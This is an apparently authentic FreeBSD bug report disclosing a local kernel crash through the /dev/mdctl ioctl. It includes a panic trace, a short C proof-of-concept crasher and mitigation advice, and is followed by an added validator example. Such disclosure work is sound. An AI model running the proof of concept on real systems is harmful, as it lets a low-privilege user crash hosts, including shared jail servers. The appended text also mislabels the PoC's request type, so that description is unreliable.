From: Filip Palian
To: freebsd-gnats-submit@FreeBSD.org
Date: Fri, 6 Jul 2012 16:32:10 GMT
Message-Id: <201207061632.q66GWAfw021894@red.freebsd.org>
Resent-Date: Fri, 6 Jul 2012 16:40:03 GMT
Resent-Message-Id: <201207061640.q66Ge3a2024115@freefall.freebsd.org>
Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer)
Resent-To: freebsd-bugs@FreeBSD.org
Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Filip Palian
Subject: misc/169683: System crash via ioctl() on mdctl.

>Number:         169683
>Category:       misc
>Synopsis:       System crash via ioctl() on mdctl.
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Fri Jul 06 16:40:03 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator:     Filip Palian
>Release:        FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
A user who has read permission on "/dev/mdctl" is able to crash the system (also from within a jail, if the device is provided there by devfs(.rules)) via the ioctl() handler in "/usr/src/sys/dev/md/md.c:1127". The crash occurs in the function bcopy() (md.c:491), called in mdstart_preload() (md.c:493). Some detailed information is included below.

-- cut --
fbsd dumped core - see /var/crash/vmcore.0
..
panic: page fault
..
Unread portion of the kernel message buffer:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address   = 0xd550ba7a
fault code              = supervisor read, page not present
instruction pointer     = 0x20:0xc0d46bfe
stack pointer           = 0x28:0xd8e13ca0
frame pointer           = 0x28:0xd8e13cbc
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, def32 1, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 3154 (md671657984)
trap number             = 12
panic: page fault
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b157 at kdb_backtrace+0x47
#1 0xc0a186b7 at panic+0x117
#2 0xc0d48cf3 at trap_fatal+0x323
#3 0xc0d48fa0 at trap_pfault+0x2a0
#4 0xc0d49b35 at trap+0x465
#5 0xc0d32a8c at calltrap+0x6
#6 0xc0731b12 at md_kthread+0x232
#7 0xc09ea997 at fork_exit+0x97
#8 0xc0d32b04 at fork_trampoline+0x8
Uptime: 9h48m43s
Physical memory: 1007 MB
Dumping 108 MB: 93 77 61 45 29 13

--
# nm -n /usr/obj/usr/src/sys/GENERIC/kernel.debug |grep c0d46b
c0d46b28 T bzero
c0d46b44 T sse2_pagezero
c0d46b64 T i686_pagezero
c0d46ba4 T fillw
c0d46bb8 T bcopyb
c0d46be4 T bcopy    <--- panicked here on $esi (0xd550ba7a)

--
(kgdb) bt
#0  doadump (textdump=1) at pcpu.h:244
#1  0xc0a1845a in kern_reboot (howto=260) at /usr/src/sys/kern/kern_shutdown.c:442
#2  0xc0a186f1 in panic (fmt=Variable "fmt" is not available.
) at /usr/src/sys/kern/kern_shutdown.c:607
#3  0xc0d48cf3 in trap_fatal (frame=0xd8e13c60, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:975
#4  0xc0d48fa0 in trap_pfault (frame=0xd8e13c60, usermode=0, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:888
#5  0xc0d49b35 in trap (frame=0xd8e13c60) at /usr/src/sys/i386/i386/trap.c:558
#6  0xc0d32a8c in calltrap () at /usr/src/sys/i386/i386/exception.s:168
#7  0xc0d46bfe in bcopy () at /usr/src/sys/i386/i386/support.s:196
Previous frame inner to this frame (corrupt stack?)
-- cut --

>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
Validate input data from user to xmdctlioctl() in "/usr/src/sys/dev/md/md.c". To prevent evil users from doing bad things, administrators should ensure that "/dev/mdctl" permissions are +rw (600) for root only. For servers where jails are provided to untrusted users (e.g. hosting companies), access to the "/dev/mdctl" device should be forbidden/hidden using devfs.rules.

Patch attached with submission follows:

/* Headers restored here; the extraction had stripped the file names from the #include lines. */
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/mdioctl.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int
main(void)
{
	int f;
	struct md_ioctl s;
	struct stat ss;

	s.md_version = MDIOVERSION;
	//s.md_type = MD_PRELOAD;
	s.md_type = MD_MALLOC;
	/* this one becomes sc->pl_ptr */
	s.md_base = 0x41414141-0x200;

	if (stat("/dev/mdctl", &ss) != 0) {
		printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit (0);
	}

	/* read access is all the ioctl path requires */
	f = open("/dev/mdctl", O_RDONLY, 0);
	printf("say goodnight...\n");
	if (ioctl(f, MDIOCATTACH, &s) < 0)
		printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));
	printf("no +r no fun\n");
	exit (0);
}

>Release-Note:
>Audit-Trail:
>Unformatted:
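The input validation the ">Fix:" section calls for, as an added example that is not part of this PR and not FreeBSD's own md.c code: a user-space model of an argument checker for the MDIOCATTACH request. `struct md_attach_req`, `MODEL_MDIOVERSION`, the `MODEL_MD_*` values, `md_validate_attach()` and the sample-request helpers are hypothetical stand-ins for the kernel's `struct md_ioctl` and `MD_*` constants. The policy it enforces follows the report: only known types are accepted, the size must be non-zero, a type that does not use md_base must not carry one, and a preload base may never be chosen from user context, because mdstart_preload() treats md_base as a kernel pointer and bcopy()s from it (frame #7 in the backtrace).

```c
/*
 * Added example (not FreeBSD code): user-space model of the argument
 * validation the report asks for in the MDIOCATTACH ioctl handler.
 * struct md_attach_req and the MODEL_* constants are hypothetical
 * stand-ins for the kernel's struct md_ioctl and MD_* values.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define MODEL_MDIOVERSION 1u          /* hypothetical interface version */

enum md_model_type {                  /* hypothetical md_type values */
	MODEL_MD_MALLOC  = 1,
	MODEL_MD_PRELOAD = 2,
	MODEL_MD_VNODE   = 3,
	MODEL_MD_SWAP    = 4
};

struct md_attach_req {
	unsigned md_version;
	unsigned md_type;
	uint64_t md_base;   /* MD_PRELOAD only: address the backing data is read from */
	uint64_t md_size;   /* backing store size in bytes */
};

/*
 * Return 0 if the request may be handed to the attach code, otherwise the
 * errno value the ioctl should fail with.  from_userland is 1 when the
 * request arrived through the /dev/mdctl ioctl path.
 */
int
md_validate_attach(const struct md_attach_req *r, int from_userland)
{
	if (r->md_version != MODEL_MDIOVERSION)
		return (EINVAL);
	if (r->md_size == 0)
		return (EINVAL);

	switch (r->md_type) {
	case MODEL_MD_MALLOC:
	case MODEL_MD_VNODE:
	case MODEL_MD_SWAP:
		/* md_base has no meaning for these types; a stray value is rejected. */
		if (r->md_base != 0)
			return (EINVAL);
		return (0);
	case MODEL_MD_PRELOAD:
		/*
		 * The preload path copies from md_base as a kernel pointer.
		 * A caller outside the kernel must not choose that address, and
		 * even an in-kernel caller must not supply a range that wraps.
		 */
		if (from_userland)
			return (EPERM);
		if (r->md_base > UINT64_MAX - r->md_size)
			return (EINVAL);
		return (0);
	default:
		return (EINVAL);
	}
}

/* Constructed sample requests (not captured from a real system). */

/* Shaped like the PR's PoC: valid version, preload type, caller-chosen base. */
int
validate_poc_shaped_request(int from_userland)
{
	struct md_attach_req r = {
		MODEL_MDIOVERSION, MODEL_MD_PRELOAD, 0x41414141u - 0x200, 4096
	};
	return (md_validate_attach(&r, from_userland));
}

/* An ordinary malloc-backed disk of the given size requested from user space. */
int
validate_malloc_request(uint64_t size)
{
	struct md_attach_req r = { MODEL_MDIOVERSION, MODEL_MD_MALLOC, 0, size };
	return (md_validate_attach(&r, 1));
}

/* A type value the handler does not know. */
int
validate_unknown_type_request(void)
{
	struct md_attach_req r = { MODEL_MDIOVERSION, 99, 0, 4096 };
	return (md_validate_attach(&r, 1));
}

int
main(void)
{
	printf("PoC-shaped request from user space: errno %d\n", validate_poc_shaped_request(1));
	printf("same request from kernel context:   errno %d\n", validate_poc_shaped_request(0));
	printf("malloc disk, 4096 bytes:            errno %d\n", validate_malloc_request(4096));
	printf("malloc disk, zero size:             errno %d\n", validate_malloc_request(0));
	printf("unknown type:                       errno %d\n", validate_unknown_type_request());
	return (0);
}
```

The check runs before any state is allocated, so a rejected request never reaches the per-unit attach code or the md kernel thread where the crash in the report occurs. The administrative measures the report lists (mode 600 on "/dev/mdctl" and hiding the node inside jails with devfs.rules) remain worthwhile as defence in depth, since they limit who can reach the handler at all.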